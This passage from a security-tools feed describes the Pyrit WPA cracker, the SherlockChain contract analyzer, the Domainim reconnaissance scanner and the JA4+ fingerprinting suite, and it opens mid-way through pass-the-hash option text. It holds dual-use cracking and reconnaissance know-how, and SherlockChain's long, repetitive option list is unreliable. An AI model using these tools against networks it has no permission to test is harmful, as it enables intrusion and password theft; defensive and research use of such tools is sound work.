-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of the pre-computed WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate subsequent traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; it allows the attacker to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (outdated).


The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems and x86, Alpha, ARM, HPPA, MIPS, PowerPC, S390 and SPARC as processors.

Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
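For reference, each PMK is PBKDF2-HMAC-SHA1 over the passphrase, salted with the network's ESSID, at 4096 iterations producing 32 bytes. That is the computation Pyrit precomputes and stores; a one-function example using only Python's standard library (the passphrase and ESSID below are placeholders):

```python
# One WPA/WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, essid,
# 4096 iterations, 32 bytes). This is the computation Pyrit precomputes;
# the values below are placeholders.
import hashlib

def pmk(passphrase: str, essid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

print(pmk("password123", "MyHomeWiFi").hex())
```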

These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage server directly, providing four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC interface and provides three computational nodes, two of which actually access the RPC interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue at https://github.com/JPaulMora/Pyrit/issues.



SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

By: Zion3R


SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


Key Features

  • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
  • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
  • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
  • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
  • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
  • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

Installation

To install SherlockChain, follow these steps:

git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .

AI-Powered Features

SherlockChain's AI integration brings several advanced capabilities to the table:

  1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
  2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
  3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
  4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

  1. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

  2. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
  3. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
  4. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
  5. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
  6. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

Example usage:

sherlockchain --help

This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

  • Vulnerability detection options: --detect, --exclude-detectors
  • Reporting options: --report-format, --report-output, --report-*
  • Filtering options: --filter-*
  • AI integration options: --ai-*
  • Integration with development frameworks: --truffle, --truffle-build-directory
  • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

AI-Powered Detectors

Num Detector What it Detects Impact Confidence
1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
Detectors

Num Detector What it Detects Impact Confidence
1 abiencoderv2-array Storage abiencoderv2 array High High
2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
3 array-by-reference Modifying storage array by value High High
4 encode-packed-collision ABI encodePacked Collision High High
5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
6 multiple-constructors Multiple constructor schemes High High
7 name-reused Contract's name reused High High
8 protected-vars Detected unprotected variables High High
9 public-mappings-nested Public mappings with nested variables High High
10 rtlo Right-To-Left-Override control character is used High High
11 shadowing-state State variables shadowing High High
12 suicidal Functions allowing anyone to destruct the contract High High
13 uninitialized-state Uninitialized state variables High High
14 uninitialized-storage Uninitialized storage variables High High
15 unprotected-upgrade Unprotected upgradeable contract High High
16 codex Use Codex to find vulnerabilities. High Low
17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
19 controlled-array-length Tainted array length assignment High Medium
20 controlled-delegatecall Controlled delegatecall destination High Medium
21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
22 incorrect-exp Incorrect exponentiation High Medium
23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
24 msg-value-loop msg.value inside a loop High Medium
25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
26 return-leave If a return is used instead of a leave. High Medium
27 storage-array Signed storage integer array compiler bug High Medium
28 unchecked-transfer Unchecked tokens transfer High Medium
29 weak-prng Weak PRNG High Medium
30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
31 enum-conversion Detect dangerous enum conversion Medium High
32 erc20-interface Incorrect ERC20 interfaces Medium High
33 erc721-interface Incorrect ERC721 interfaces Medium High
34 incorrect-equality Dangerous strict equalities Medium High
35 locked-ether Contracts that lock ether Medium High
36 mapping-deletion Deletion on mapping containing a structure Medium High
37 shadowing-abstract State variables shadowing from abstract contracts Medium High
38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
39 tautology Tautology or contradiction Medium High
40 write-after-write Unused write Medium High
41 boolean-cst Misuse of Boolean constant Medium Medium
42 constant-function-asm Constant functions using assembly code Medium Medium
43 constant-function-state Constant functions changing the state Medium Medium
44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
47 reused-constructor Reused base constructor Medium Medium
48 tx-origin Dangerous usage of tx.origin Medium Medium
49 unchecked-lowlevel Unchecked low-level calls Medium Medium
50 unchecked-send Unchecked send Medium Medium
51 uninitialized-local Uninitialized local variables Medium Medium
52 unused-return Unused return values Medium Medium
53 incorrect-modifier Modifiers that can return the default value Low High
54 shadowing-builtin Built-in symbol shadowing Low High
55 shadowing-local Local variables shadowing Low High
56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
57 variable-scope Local variables used prior their declaration Low High
58 void-cst Constructor called not implemented Low High
59 calls-loop Multiple calls in a loop Low Medium
60 events-access Missing Events Access Control Low Medium
61 events-maths Missing Events Arithmetic Low Medium
62 incorrect-unary Dangerous unary expressions Low Medium
63 missing-zero-check Missing Zero Address Validation Low Medium
64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
67 timestamp Dangerous usage of block.timestamp Low Medium
68 assembly Assembly usage Informational High
69 assert-state-change Assert state change Informational High
70 boolean-equal Comparison to boolean constant Informational High
71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
72 deprecated-standards Deprecated Solidity Standards Informational High
73 erc20-indexed Un-indexed ERC20 event parameters Informational High
74 function-init-state Function initializing state variables Informational High
75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
76 low-level-calls Low level calls Informational High
77 missing-inheritance Missing inheritance Informational High
78 naming-convention Conformity to Solidity naming conventions Informational High
79 pragma If different pragma directives are used Informational High
80 redundant-statements Redundant statements Informational High
81 solc-version Incorrect Solidity version Informational High
82 unimplemented-functions Unimplemented functions Informational High
83 unused-import Detects unused imports Informational High
84 unused-state Unused state variables Informational High
85 costly-loop Costly operations in a loop Informational Medium
86 dead-code Functions that are not used Informational Medium
87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
88 similar-names Variable names are too similar Informational Medium
89 too-many-digits Conformance to numeric notation best practices Informational Medium
90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
91 constable-states State variables that could be declared constant Optimization High
92 external-function Public function that could be declared external Optimization High
93 immutable-states State variables that could be declared immutable Optimization High
94 var-read-using-this Contract reads its own variable using this Optimization High


Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

By: Zion3R


Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


Features

Current features (v1.0.1):

  • Subdomain enumeration (2 engines + bruteforcing)
  • User-friendly output
  • Resolving A records (IPv4)
  • Virtual hostname enumeration
  • Reverse DNS lookup
  • Detects wildcard subdomains (for bruteforcing)
  • Basic TCP port scanning
  • Subdomains are accepted as input
  • Export results to JSON file

A few features are work in progress. See Planned features for more details.

The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

Installation

You can build this repo from source:

  • Clone the repository
git clone git@github.com:pptx704/domainim
  • Build the binary
nimble build
  • Run the binary
./domainim <domain> [--ports=<ports>]

Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

Usage

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
  • <domain> is the domain to be enumerated. It can be a subdomain as well.
  • --ports | -p is a string specification of the ports to be scanned (see the parsing sketch after this list). It can be one of the following-
  • all - Scan all ports (1-65535)
  • none - Skip port scanning (default)
  • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
  • single value - Scan a single port. i.e. 80 scans port 80
  • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
  • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
  • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
  • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
  • a.b.c.d - Use DNS server at a.b.c.d on port 53
  • a.b.c.d#n - Use DNS server at a.b.c.d on port n
  • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
  • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch starts only after the previous one completes. Since queries can be rate limited, increasing this value does not always guarantee faster results.
  • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.
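To make the port specification format concrete, here is a minimal Python sketch of how such a string might be parsed. This is illustrative only, not Domainim's actual Nim implementation, and TOP_PORTS is a hypothetical placeholder for a real nmap-style top-ports list:

def parse_ports(spec: str) -> set[int]:
    # Parse a Domainim-style port specification into a set of port numbers.
    if spec == "none":
        return set()
    if spec == "all":
        return set(range(1, 65536))
    ports: set[int] = set()
    for part in spec.split(","):
        if part.startswith("t"):               # t<n>: top n ports, capped at 5000
            n = min(int(part[1:]), 5000)
            ports.update(TOP_PORTS[:n])
        elif "-" in part:                      # range, e.g. 8080-8090
            lo, hi = map(int, part.split("-"))
            ports.update(range(lo, hi + 1))
        else:                                  # single port, e.g. 80
            ports.add(int(part))
    return ports

TOP_PORTS = [80, 443, 22, 21, 25, 3389, 110, 445, 139, 143]  # placeholder list only

print(sorted(parse_ports("80,443,8080-8090,t5")))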

Examples
  • ./domainim nmap.org --ports=all
  • ./domainim google.com --ports=none --dns=8.8.8.8#53
  • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
  • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
  • ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

The help menu can be accessed using ./domainim --help or ./domainim -h.

Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)

Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`

Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns=1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns=8.8.8.8 -r:1500 -o:results.json

The JSON schema for the results is as follows-

[
  {
    "subdomain": string,
    "data": [
      {
        "ipv4": string,
        "vhosts": [string],
        "reverse_dns": string,
        "ports": [int]
      }
    ]
  }
]

Example json for nmap.org can be found here.
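As a quick post-processing example, the following Python snippet loads a result file produced with --out and prints every subdomain that has at least one open port (the file name is an assumption):

import json

with open("results.json") as f:   # produced with --out=results.json
    results = json.load(f)

for entry in results:
    for record in entry["data"]:
        if record["ports"]:       # skip hosts with no open ports
            print(f'{entry["subdomain"]} ({record["ipv4"]}): {record["ports"]}')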

Contributing

Contributions are welcome. Feel free to open a pull request or an issue.

Planned Features

  • [x] TCP port scanning
  • [ ] UDP port scanning support
  • [ ] Resolve AAAA records (IPv6)
  • [x] Custom DNS server
  • [x] Add bruteforcing subdomains using a wordlist
  • [ ] Force bruteforcing (even if wildcard subdomain is found)
  • [ ] Add more engines for subdomain enumeration
  • [x] File output (JSON)
  • [ ] Multiple domain enumeration
  • [ ] Dir and File busting

Others

  • [x] Update verbose output when encountering errors (v0.2.0)
  • [x] Show progress bar for longer operations
  • [ ] Add individual port scan progress bar
  • [ ] Add tests
  • [ ] Add comments and docstrings

Additional Notes

This project is still in its early stages. There are several limitations I am aware of.

The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is that it sometimes returns an SQL error. So for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute force engine).

The port scanner uses only the ping response time plus a 750ms timeout. This might lead to false negatives. Since domainim is not meant for port scanning but for providing a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

It might seem that the way vhostnames are printed just brings repetition to the table.

Printing them as follows might've been better-

ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scanme.nmap.org, svn.nmap.org, www.nmap.org
โ†ณ 45.33.49.119
โ†ณ Reverse DNS: ack.nmap.org.

But previously while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.

The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) per query for IPv4 resolving. This avoids hitting the DNS server with all the queries at once and spreads them out in a more natural way. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.
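The batch-plus-jitter idea can be sketched in a few lines of Python. This is illustrative only (Domainim itself implements this in Nim with asynchronous queries):

import random
import socket
import time

def resolve_batched(names, batch_size=64):
    # Resolve names batch by batch; the next batch starts only after the
    # previous one completes, and each query is jittered by 0-300 ms.
    results = {}
    for i in range(0, len(names), batch_size):
        for name in names[i:i + batch_size]:
            time.sleep(random.uniform(0, 0.3))
            try:
                results[name] = socket.gethostbyname(name)
            except socket.gaierror:
                pass
    return results

print(resolve_batched(["nmap.org", "scanme.nmap.org"]))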

One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs exist for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author on this.

For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for every candidate subdomain. However, this also skips valid subdomains (e.g. scanme.nmap.org would be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
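Wildcard detection itself can be approximated by resolving a label that almost certainly does not exist. A minimal sketch of that heuristic:

import socket
import uuid

def has_wildcard(domain: str) -> bool:
    # If a random, non-existent label resolves, the zone likely has a wildcard record.
    probe = f"{uuid.uuid4().hex}.{domain}"
    try:
        socket.gethostbyname(probe)
        return True
    except socket.gaierror:
        return False

print(has_wildcard("nmap.org"))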

A similar thing is true for vhost enumeration with subdomain inputs. Since only URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scanme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.

License

MIT License. See LICENSE for full text.



JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R


JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
Cloudflare
fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark https://www.wireshark.org/download.html which will install tshark
2) Add tshark to $PATH

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

